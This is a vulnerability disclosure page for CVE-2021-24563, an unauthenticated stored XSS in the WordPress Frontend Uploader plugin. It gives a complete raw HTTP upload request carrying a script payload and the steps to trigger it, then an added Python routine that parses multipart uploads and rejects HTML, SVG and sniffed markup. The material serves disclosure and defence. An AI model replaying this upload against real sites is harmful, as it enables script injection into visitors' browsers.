
CVE-2021-24563 PoC — WordPress plugin cross-site scripting vulnerability

Associated Vulnerability
Title: WordPress plugin cross-site scripting vulnerability (CVE-2021-24563)
Description: WordPress plugins are application plugins for the open-source WordPress platform. The WordPress plugin Frontend Uploader before version 1.3.2 contains a cross-site scripting vulnerability. The flaw stems from the plugin not blocking the upload of HTML files: for example, it allows an unauthenticated user to upload a malicious HTML file containing JavaScript, and the malicious code is triggered when someone accesses the file directly.
Description
The plugin does not prevent HTML files from being uploaded via its form, allowing an unauthenticated user to upload a malicious HTML file (containing JavaScript, for example), which will be triggered when someone accesses the file directly.
Readme
# CVE-2021-24563
Frontend Uploader <= 1.3.2 - Unauthenticated Stored Cross-Site Scripting

The plugin does not prevent HTML files from being uploaded via its form, allowing an unauthenticated user to upload a malicious HTML file (containing JavaScript, for example), which will be triggered when someone accesses the file directly.

# Proof of Concept

On a page or post where the `[fu-upload-form]` shortcode is embedded, simply upload an HTML file via the generated form:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------124662954015823207281179831654
Content-Length: 1396
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_ID"

1247
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_title"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="post_content"

test
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="files[]"; filename="xss.html"
Content-Type: text/html

<script>alert(/XSS/)</script>
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="action"

upload_ugc
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_layout"

image
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="fu_nonce"

021fb612f9
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/frontend-uploader-form/
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="ff"

92b6cbfa6120e13ff1654e28cef2a271
-----------------------------124662954015823207281179831654
Content-Disposition: form-data; name="form_post_id"

1247
-----------------------------124662954015823207281179831654--
```

Then access the uploaded file to trigger the XSS, i.e. https://example.com/wp-content/uploads/2021/07/xss.html
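The root cause is that the form accepts a file part whose extension and content a browser will render as a document. The following is an added example, not code from the plugin or the PoC author: a server-side triage routine that parses a `multipart/form-data` body of the shape shown above, picks out the `files[]` part, and refuses uploads that a browser would execute script from. It goes beyond the page's single case by also catching an HTML payload renamed to a `.jpg` via a content sniff. The boundary and field names are taken from the request above; `build_body`, the sample bodies, and the extension/type allow-deny sets are constructed for this example.

```python
"""Upload triage for the Frontend Uploader issue (added example, not plugin code)."""
import re

# Extensions that browsers render as a document (and run script from) when the
# file is opened directly from wp-content/uploads.
ACTIVE_EXTENSIONS = {"html", "htm", "xhtml", "shtml", "svg", "xml", "xsl"}
# Declared MIME types that likewise mean "render me as a document".
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/xml", "application/xml"}
# Crude HTML sniff over the first KiB, applied regardless of filename or declared
# type, so renaming xss.html to xss.jpg does not bypass the check.
HTML_MARKERS = re.compile(rb"<\s*(!doctype|html|script|iframe|svg|body|object|embed)\b",
                          re.IGNORECASE)


def boundary_from_content_type(content_type: str) -> str:
    """Extract the boundary token from a multipart/form-data Content-Type header."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("not a multipart/form-data request")
    return m.group(2)


def parse_multipart(body: bytes, boundary: str) -> list:
    """Split a multipart/form-data body into parts: name, filename, content_type, data."""
    delimiter = b"--" + boundary.encode("ascii")
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):                  # closing delimiter: --boundary--
            break
        if chunk.startswith(b"\r\n"):                # CRLF that follows the delimiter
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):                   # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'name="([^"]*)"', disp)
        filename = re.search(r'filename="([^"]*)"', disp)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": filename.group(1) if filename else None,
            "content_type": headers.get("content-type", ""),
            "data": data,
        })
    return parts


def check_file(filename: str, declared_type: str, data: bytes):
    """Return (allowed, reason) for one uploaded file."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in ACTIVE_EXTENSIONS:
        return False, "extension .%s is rendered as a document by browsers" % ext
    if declared_type.split(";")[0].strip().lower() in ACTIVE_TYPES:
        return False, "declared type %s is active content" % declared_type
    if HTML_MARKERS.search(data[:1024]):
        return False, "content sniffs as HTML markup"
    return True, "ok"


def triage_request(body: bytes, content_type: str) -> list:
    """Run check_file over every file part; returns [(filename, allowed, reason), ...]."""
    boundary = boundary_from_content_type(content_type)
    results = []
    for part in parse_multipart(body, boundary):
        if part["filename"] is None:
            continue                                 # ordinary form field, not a file
        allowed, reason = check_file(part["filename"], part["content_type"], part["data"])
        results.append((part["filename"], allowed, reason))
    return results


def build_body(boundary: str, fields: dict, filename: str, ctype: str, data: bytes) -> bytes:
    """Construct a multipart body in the shape of the PoC request (constructed helper)."""
    b = boundary.encode("ascii")
    lines = []
    for key, value in fields.items():
        lines += [b"--" + b, b'Content-Disposition: form-data; name="' + key.encode() + b'"',
                  b"", value.encode()]
    lines += [b"--" + b,
              b'Content-Disposition: form-data; name="files[]"; filename="' + filename.encode() + b'"',
              b"Content-Type: " + ctype.encode(), b"", data,
              b"--" + b + b"--", b""]
    return b"\r\n".join(lines)


# Constructed samples modelled on the PoC request (boundary and field names from the page).
BOUNDARY = "---------------------------124662954015823207281179831654"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
FIELDS = {"post_ID": "1247", "post_title": "test", "action": "upload_ugc", "form_layout": "image"}
POC_BODY = build_body(BOUNDARY, FIELDS, "xss.html", "text/html", b"<script>alert(/XSS/)</script>")
RENAMED_BODY = build_body(BOUNDARY, FIELDS, "xss.jpg", "image/jpeg", b"<script>alert(/XSS/)</script>")
BENIGN_BODY = build_body(BOUNDARY, FIELDS, "photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("renamed", RENAMED_BODY), ("benign", BENIGN_BODY)):
        print(label, triage_request(body, CONTENT_TYPE))
```

The three checks are layered on purpose: the extension test is what the fix in 1.3.2 needed most, the declared-type test stops a client that lies in its own `Content-Type` part header, and the sniff is defence in depth against a payload that passes both but would still be served as a document by a misconfigured web server. In a real WordPress deployment the same policy belongs in the `upload_mimes` filter and in the web server's rules for `wp-content/uploads`, which should never serve `.html` or `.svg` with a rendering content type.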
# Video POC:
https://www.youtube.com/watch?v=lfrLoHl4-Zs